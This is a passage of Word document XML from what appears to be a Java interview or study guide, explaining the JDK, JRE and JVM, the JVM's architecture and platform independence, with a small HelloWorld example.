        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java Memory Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="6792C464" w14:textId="77777777" w:rsidR="006A20C6" w:rsidRPr="00CE4B95" w:rsidRDefault="006A20C6" w:rsidP="00322B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CB50A0"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2" w:name="_Toc197867306"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JDK, JRE?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="1FE78364" w14:textId="41AC11D9" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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vs JRE – Explained Simply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA85964"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CF6E5">
          <v:rect id="_x0000_i1238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879FE6F"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Java Development Kit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22CF81"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DK is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complete software development kit</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develop Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F3FE9"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19C3A26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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Runtime Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01399A8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javac)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – to compile .java files into .class files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E978AC"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bugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7133D"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ols</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for monitoring and developing Java applications (like javadoc, javap, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39C557"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developers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write, compile, and run Java programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54894F"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When you're developing Java applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>install the JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924971B"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2896AB">
          <v:rect id="_x0000_i1239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5C6F1"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RE (Java Runtime Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DE71D"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RE provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>minimum environment to run Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C481C06"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2567FFE0"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Java Virtual Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D00B38"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e Java libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like java.lang, java.util)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B2AD3"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ing files and class loaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6C56E"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user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tion environments</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run</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java applications (not develop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0F290"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If you're only running Java applications (not writing code), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>install only JRE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722663D6"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8F20B">
          <v:rect id="_x0000_i1240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D10DAA"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270"/>
        <w:gridCol w:w="2471"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="2A03A894" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00061598"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4770BBD"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660A08E2"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RE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="0C59BAAE" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6966FB4C"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form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC3820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Development Kit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D60243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Runtime Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="781D3C1B" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695B6C3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735467D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RE + Development tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0821148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 Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="2796934B" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1497D97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207D5A7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 + Run Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0403F9E6"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Run Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="6AE128A6" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="569D7A9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Compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7273C9BD"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F0F59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203CA" w:rsidRPr="00CE4B95" w14:paraId="41B21258" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AE14E0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="107C62B4"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0EE351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B203CA" w:rsidRPr="00CE4B95" w14:paraId="6639EC85" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="677695FB"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o uses it?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B649A1F"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D796C3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users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5733A978"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A5443">
          <v:rect id="_x0000_i1241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F943CC"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onus: JVM (Java Virtual Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAAD5D5"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compiled Java bytecode (.class files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA1570"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verts bytecode into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>machine-specific code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497520FC"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t execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F3F56" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1269BA" w14:textId="1C142DD5" w:rsidR="00102AE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00102AE6" w:rsidP="00102AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192B4326"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3" w:name="_Toc197867307"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JVM?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="44F880DC" w14:textId="554A333A" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that runs Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C744F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529B1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virtual computer that runs your compiled Java bytecode (.class files), not the source code (.java).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94D70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C35BD">
          <v:rect id="_x0000_i1243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="680953C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5363"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="1187ECB5" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48DFA9EC"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ole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47869827"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4B07A4F0" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26909B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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B3A683"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the .class file generated by the Java compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="4A2F8827" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4F719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rifies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C6797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bytecode for security and correctness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="0384292D" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C870E8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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0445C43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bytecode using the Just-In-Time (JIT) compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="67C6842C" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002C5E9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s Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4136A0E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heap, stack, garbage collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45C96932"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65931">
          <v:rect id="_x0000_i1244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD57B8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Architecture (High-Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFE39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er System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC29D8"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lass files into JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE3091"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oading, linking, and initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F9F02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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E30CD"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level structures (metadata, static variables, method info)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20230A4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p w14:paraId="7B4D3B06"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nd instance variables (shared)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE4618"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p w14:paraId="5633FCB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frames (local variables, partial results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23736EF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gram Counter (PC) Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75F70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s to the current executing instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9322A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Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA47F2F"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bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB02237"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JIT (Just-In-Time Compiler) for optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D604A"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ive Method Interface &amp; Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03B539"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Java to call non-Java (native) code like C/C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C2A58"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89C39">
          <v:rect id="_x0000_i1245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26013542"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525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="6650219C" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1764DCC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1377645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0EB0B0F9" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B2641A1"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B07CC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JRE, responsible for running Java bytecode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="0C78D5A8" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B81F489"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338EE87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 + libraries to run Java apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="52726484" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A938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00F858C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RE + tools to develop Java apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09870BD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2DEE01">
          <v:rect id="_x0000_i1246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD63D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latform Independence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744CD05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ode is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compiled into bytecode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not machine code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1057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ytecode is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>platform-independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709AEC02"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VM on each platform interprets or compiles it to native code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D03C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07827">
          <v:rect id="_x0000_i1247" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45660D3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251673F"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elloWorld {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2A3F8"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8930E5"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JVM!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042585D4"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8BD82E"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F11F19"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d to HelloWorld.class (bytecode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42D95F"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loads and runs the bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D68A0E" w14:textId="32E32D7A"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48" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7461A" w14:textId="77777777" w:rsidR="005A57B7" w:rsidRPr="00CE4B95" w:rsidRDefault="005A57B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
